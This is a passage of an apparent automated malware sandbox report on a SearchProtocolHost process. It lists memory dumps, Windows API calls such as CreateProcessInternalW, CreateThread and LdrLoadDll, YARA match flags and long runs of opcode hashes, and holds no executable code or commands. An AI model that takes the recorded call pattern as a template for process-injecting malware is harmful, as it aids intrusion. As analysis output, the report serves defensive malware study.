                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 98af2a280aa55018437850f96076a40f33b9cc3e98c0e6507f59a525b63bdbd0
                                                                                      • Instruction ID: a7206be6eacc6cda3fdc583fa66de420e8dae970f3f00006a7d99b4a03dff13e
                                                                                      • Opcode Fuzzy Hash: 98af2a280aa55018437850f96076a40f33b9cc3e98c0e6507f59a525b63bdbd0
                                                                                      • Instruction Fuzzy Hash: 9A90023121100C52E500A2584504B46000587E4701F51C52AA4114654DC725C8517522
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 6e4bc14f9d4ea45e5104e02fd7c4b4286cf9c55072904d5eda80fcbf7ae43a00
                                                                                      • Instruction ID: 4de4980ce8c5b1933b2488b5ce3785b411379eb944609e28587a0536db040bd3
                                                                                      • Opcode Fuzzy Hash: 6e4bc14f9d4ea45e5104e02fd7c4b4286cf9c55072904d5eda80fcbf7ae43a00
                                                                                      • Instruction Fuzzy Hash: CC900225231004125545E658070450B044597DA751391C529F5406590CC73188657322
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 1e24ee1b8e4b0838f577831f80e6f8234a72b8ae707876842b1b64ed5f17a6e5
                                                                                      • Instruction ID: 79dd7b2aa7c363fd8157c58f1cabdbed04602a52fa8dc0bb0ab7d0ec78a2ed50
                                                                                      • Opcode Fuzzy Hash: 1e24ee1b8e4b0838f577831f80e6f8234a72b8ae707876842b1b64ed5f17a6e5
                                                                                      • Instruction Fuzzy Hash: 7290023161500C12E550B2584514746000587D4701F51C525A4014654DC7658A5576A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: f90b9c74ad91a3437743d147ea15f26df152a999acba879c8a87fdc1c76a7461
                                                                                      • Instruction ID: 3a4c80bc2f8c882f7c02d8f79de3eff806b84da53262bd17515fd69b398c5fba
                                                                                      • Opcode Fuzzy Hash: f90b9c74ad91a3437743d147ea15f26df152a999acba879c8a87fdc1c76a7461
                                                                                      • Instruction Fuzzy Hash: CD900261212004139505B2584514616400A87E4601B51C535E5004590DC63588917126
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: b855398b88cbff5674e3b788afc1fc4a38dd7f7a500f7b5cdbda66fdfa264c59
                                                                                      • Instruction ID: 44c9cc92a074ff1c0a8f12f7bfb0a0bc18ca0cc139cece2f542b5d9f17324ea9
                                                                                      • Opcode Fuzzy Hash: b855398b88cbff5674e3b788afc1fc4a38dd7f7a500f7b5cdbda66fdfa264c59
                                                                                      • Instruction Fuzzy Hash: C5900435331004135505F75C07045070047C7DD751351C535F5005550CD731CC717133
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 602e45325221865e1cc0ba40252343f19d16c67d5cb53a6226f07738df6cd780
                                                                                      • Instruction ID: 63a69425d1d10477af3eba11ee162a8df0282a60c837d10ca009846787472ab6
                                                                                      • Opcode Fuzzy Hash: 602e45325221865e1cc0ba40252343f19d16c67d5cb53a6226f07738df6cd780
                                                                                      • Instruction Fuzzy Hash: 9D90022125505512E550B25C45046164005A7E4601F51C535A4804594DC66588557222
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 286ef452b234986955f5d3406d006fa12deb3c912515b9fc5b1b1431573649d4
                                                                                      • Instruction ID: e636ea312d8068f2a8f1e1dc7c1df9b96b4bc14bfacba388f80c3ba2602a9696
                                                                                      • Opcode Fuzzy Hash: 286ef452b234986955f5d3406d006fa12deb3c912515b9fc5b1b1431573649d4
                                                                                      • Instruction Fuzzy Hash: 7690022122180452E600A6684D14B07000587D4703F51C629A4144554CCA2588617522
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: fe8139a38e20d84c5782e3e375f4c97f42b7e1470c46c9973df60efb8b79dd6c
                                                                                      • Instruction ID: 90b3400cb2d7a177c607e8860fa862471c6dfb134f3e616f6d1ecfeb5047a0e0
                                                                                      • Opcode Fuzzy Hash: fe8139a38e20d84c5782e3e375f4c97f42b7e1470c46c9973df60efb8b79dd6c
                                                                                      • Instruction Fuzzy Hash: 6790026135100852E500A2584514B060005C7E5701F51C529E5054554DC729CC527127
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 18d6c1e06640155f0243671725ca0f58c91afacd9182146bc27b9feb1f60d57e
                                                                                      • Instruction ID: 52db39dff23453c3c249fea8523dce9be126b227b13e2c40b0e07ab22f1648d7
                                                                                      • Opcode Fuzzy Hash: 18d6c1e06640155f0243671725ca0f58c91afacd9182146bc27b9feb1f60d57e
                                                                                      • Instruction Fuzzy Hash: 2B90026121140813E540A6584904607000587D4702F51C525A6054555ECB398C517136
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 047d80b45d232172affb9111149a8380bb86b1bc3bb251d86e9ac05f733686a2
                                                                                      • Instruction ID: 4172d621ae03f56cc5b4bf80bd5b75ecfac35fa5f6ce2d6cc59f5b7f2bc50a35
                                                                                      • Opcode Fuzzy Hash: 047d80b45d232172affb9111149a8380bb86b1bc3bb251d86e9ac05f733686a2
                                                                                      • Instruction Fuzzy Hash: A7900221611004529540B26889449064005ABE5611751C635A4988550DC66988657666
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 14fdf872d86692bc50817f2e27fe5f1e8e840da7a7badc7d68111f430cf86c6a
                                                                                      • Instruction ID: 7e284e5ff31fb92d7808ec194249dd409642ea4bce6b02f43bd9f9d8b8cab960
                                                                                      • Opcode Fuzzy Hash: 14fdf872d86692bc50817f2e27fe5f1e8e840da7a7badc7d68111f430cf86c6a
                                                                                      • Instruction Fuzzy Hash: 6D90023121100823E511A2584604707000987D4641F91C926A4414558DD7668952B122
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 27bf6d22556e42d02174d3492acc99aa219a9ae38fbe755a1331dbcd20cd4e91
                                                                                      • Instruction ID: 15a3bb827295c6a6429c828059eb169b24c642246b157e75402e4d456f580418
                                                                                      • Opcode Fuzzy Hash: 27bf6d22556e42d02174d3492acc99aa219a9ae38fbe755a1331dbcd20cd4e91
                                                                                      • Instruction Fuzzy Hash: EA90022161100912E501B2584504616000A87D4641F91C536A5014555ECB358992B132
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 06d9e5de061d29c88437836390e4174ca002be4799c19861627f34ad1f987ea0
                                                                                      • Instruction ID: d23ee67153372c59cff63d3358fed8c54ff8b06834d4de206dc86d39602537b9
                                                                                      • Opcode Fuzzy Hash: 06d9e5de061d29c88437836390e4174ca002be4799c19861627f34ad1f987ea0
                                                                                      • Instruction Fuzzy Hash: A490022131100413E540B25855186064005D7E5701F51D525E4404554CDA2588567223
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 9f00075528cdc9855598e642376a7005f9bd4a96241e47c7fec58bbc781b7d8c
                                                                                      • Instruction ID: 210bdffc03f997ce0ffb4259be6adfb2238331c1b44ff608f3d82b123b661032
                                                                                      • Opcode Fuzzy Hash: 9f00075528cdc9855598e642376a7005f9bd4a96241e47c7fec58bbc781b7d8c
                                                                                      • Instruction Fuzzy Hash: 0590022922300412E580B258550860A000587D5602F91D929A4005558CCA2588697322
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID:
                                                                                      • API String ID: 2994545307-0
                                                                                      • Opcode ID: 27afee1b1df2c7f65cdc98da5fd997d93b40e36ee6d4a06e047b54856c264320
                                                                                      • Instruction ID: 0bcd176f020f06b1ed74e85fdabce83596bfc5c025acfc8dbff92d3720d4f5bb
                                                                                      • Opcode Fuzzy Hash: 27afee1b1df2c7f65cdc98da5fd997d93b40e36ee6d4a06e047b54856c264320
                                                                                      • Instruction Fuzzy Hash: E790022125204562A945F2584504507400697E4641791C526A5404950CC6369856F622
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32(53s9401,00000111,00000000,00000000), ref: 02DA0737
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessagePostThread
                                                                                      • String ID: 53s9401$53s9401
                                                                                      • API String ID: 1836367815-601017041
                                                                                      • Opcode ID: 67318d97ab6e384455ff974cac5a9be2c01911e63481392633f83c4461e226ba
                                                                                      • Instruction ID: 69293e185ed02e7096513d3c2adae9623cf8a3c056609bbd267d637bdab93487
                                                                                      • Opcode Fuzzy Hash: 67318d97ab6e384455ff974cac5a9be2c01911e63481392633f83c4461e226ba
                                                                                      • Instruction Fuzzy Hash: DF01C472D0110CBAEB11AAE48C91DEFBB7DDF44794F048064FA0477240D6359E068BF1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02DB22DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: f864155e938c288c630d89186789d09197ca3a6f61a98967dd0d1cc0dda5c341
                                                                                      • Instruction ID: 3c579a148774a0781235e70207154d2792567399107d9de2337c0df06210e73a
                                                                                      • Opcode Fuzzy Hash: f864155e938c288c630d89186789d09197ca3a6f61a98967dd0d1cc0dda5c341
                                                                                      • Instruction Fuzzy Hash: 5C31A1B1600304ABD714DFA4D890FA7B7B9FF48704F04856DEA9E9B344D770A944CBA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(000007D0), ref: 02DB22DB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID: net.dll$wininet.dll
                                                                                      • API String ID: 3472027048-1269752229
                                                                                      • Opcode ID: e01b65cb1afe7356bc8fba835ceb0a9f2bea0fcc0d631a4845f563c274ad98ef
                                                                                      • Instruction ID: 077bb6b68486aba345fe5be2b041a6a3d5316a74ef95eacaa000aa57d297fa73
                                                                                      • Opcode Fuzzy Hash: e01b65cb1afe7356bc8fba835ceb0a9f2bea0fcc0d631a4845f563c274ad98ef
                                                                                      • Instruction Fuzzy Hash: 3531B3B1640305ABD714DFA4D890FA6B7B9FF44704F04816DEA9E5B385D7706904CBE4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 02DA8A16
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID: @
                                                                                      • API String ID: 3188754299-2766056989
                                                                                      • Opcode ID: 3e7d1b04733835618ec0924f36c8004f485eba1a8c4eca5940c49f83b2460587
                                                                                      • Instruction ID: 3c195ee5b5aca1c645137e247efa39db9a23be13d6036b653837f90e004fea96
                                                                                      • Opcode Fuzzy Hash: 3e7d1b04733835618ec0924f36c8004f485eba1a8c4eca5940c49f83b2460587
                                                                                      • Instruction Fuzzy Hash: 427134B2910208ABDB25DB64CCD5FEFB3BDFF58304F044599A51A97240EB70AB458FA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 02DAE2C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 2538663250-2016760708
                                                                                      • Opcode ID: 2e1fad2a321328ae58c9c87d249e6c7ffe0f0fb363bccd87319ad71c5006b7e5
                                                                                      • Instruction ID: 046a1b39057d590f34c8777a6487703bb6d07ce7a4ab87ad7035f66dc7e7b0d1
                                                                                      • Opcode Fuzzy Hash: 2e1fad2a321328ae58c9c87d249e6c7ffe0f0fb363bccd87319ad71c5006b7e5
                                                                                      • Instruction Fuzzy Hash: 4A310EB6A0060AAFDB00DFD8D890DEEB7B9BF88304B108559E505AB314D775EE45CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 02DAE2C7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Initialize
                                                                                      • String ID: @J7<
                                                                                      • API String ID: 2538663250-2016760708
                                                                                      • Opcode ID: fdb738ec5bab71cf8d0ac031cb5c586ead77b81650c15eab81acff971659feb8
                                                                                      • Instruction ID: 9efc8114e616b2e9c9d9cc9440530da25cd216f8e33ca74691b0a59c75bfc376
                                                                                      • Opcode Fuzzy Hash: fdb738ec5bab71cf8d0ac031cb5c586ead77b81650c15eab81acff971659feb8
                                                                                      • Instruction Fuzzy Hash: E5311EB5A0060AAFDB00DFD8D890DEEB7B9FF88304B108559E506AB314D775EE45CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02DA3F32
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Load
                                                                                      • String ID:
                                                                                      • API String ID: 2234796835-0
                                                                                      • Opcode ID: fd6090d43753344c0b09379c6f97590599d9c140d3d7e1cf68c4173bb859a20f
                                                                                      • Instruction ID: f575eb2ec29cabc634f4abe17822966190c059badae12c09f4e97c50466e191b
                                                                                      • Opcode Fuzzy Hash: fd6090d43753344c0b09379c6f97590599d9c140d3d7e1cf68c4173bb859a20f
                                                                                      • Instruction Fuzzy Hash: 7E011EB6D0020DBBDB14DBA4DC51FDEB7B99F44308F0041A5E90997280F631EB18CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateProcessInternalW.KERNELBASE(02DA0B71,02DA0B99,02DA0971,00000000,02DA7353,00000010,02DA0B99,?,?,00000044,02DA0B99,00000010,02DA7353,00000000,02DA0971,02DA0B99), ref: 02DB5350
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateInternalProcess
                                                                                      • String ID:
                                                                                      • API String ID: 2186235152-0
                                                                                      • Opcode ID: 3a4ec6e7ce42bb4b2145899a93253166fd7430aca291ca119615390df9c56788
                                                                                      • Instruction ID: 5030a5e0340c7336b643fcb446ca98b49574dbc1a8bad035beb121a1c68cffe6
                                                                                      • Opcode Fuzzy Hash: 3a4ec6e7ce42bb4b2145899a93253166fd7430aca291ca119615390df9c56788
                                                                                      • Instruction Fuzzy Hash: 1401C4B2200108BFCB04DE89DC91EEB77ADEF8D714F408108BA0DA3241D630FC518BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D99975
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2422867632-0
                                                                                      • Opcode ID: 07943d94e61e1aa306d687394d3e58f9eabf83bf1cc28336e77a6fec52b1047c
                                                                                      • Instruction ID: c6f578d6f3614a1f2fa8295364d735d0f634620551ecd4d07228aad0fe4887bf
                                                                                      • Opcode Fuzzy Hash: 07943d94e61e1aa306d687394d3e58f9eabf83bf1cc28336e77a6fec52b1047c
                                                                                      • Instruction Fuzzy Hash: D6F065733402047AE73066AA9C02FDBB39DDF85B61F150429F74DDA2C0D9A1F84146F4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,848DF445,00000007,00000000,00000004,00000000,02DA36AC,000000F0,?,?,?,?,00000000), ref: 02DB529C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FreeHeap
                                                                                      • String ID:
                                                                                      • API String ID: 3298025750-0
                                                                                      • Opcode ID: 50deed231f1be492a842a1633da80fca67aa126142c48f54a6d4959a08e0bb21
                                                                                      • Instruction ID: f56e905a3b27e3c4954add2a55886e4e5541adeeb9106be1282e1926cde80984
                                                                                      • Opcode Fuzzy Hash: 50deed231f1be492a842a1633da80fca67aa126142c48f54a6d4959a08e0bb21
                                                                                      • Instruction Fuzzy Hash: 9FE06572200204BBDA10EE99DC44FEB77ADEFCAB10F404009F909AB241DA30BD108BF5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(02DA1D06,?,02DB3969,02DA1D06,02DB3317,02DB3969,?,02DA1D06,02DB3317,00001000,?,?,02DB6A63), ref: 02DB524C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5790791178.0000000002D90000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_2d90000_SearchProtocolHost.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
